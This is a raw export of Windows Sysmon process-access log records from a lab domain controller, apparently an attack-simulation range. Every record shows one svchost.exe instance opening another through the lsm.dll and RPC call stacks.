Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005667Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005666Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005665Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005664Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005663Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005662Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005661Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.613{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005660Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.613{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005659Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.613{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005658Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.613{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005657Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.613{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005656Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.613{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005655Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.613{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005654Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005653Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005652Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005651Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005650Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005649Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005648Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005647Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005646Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005645Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005644Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005643Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
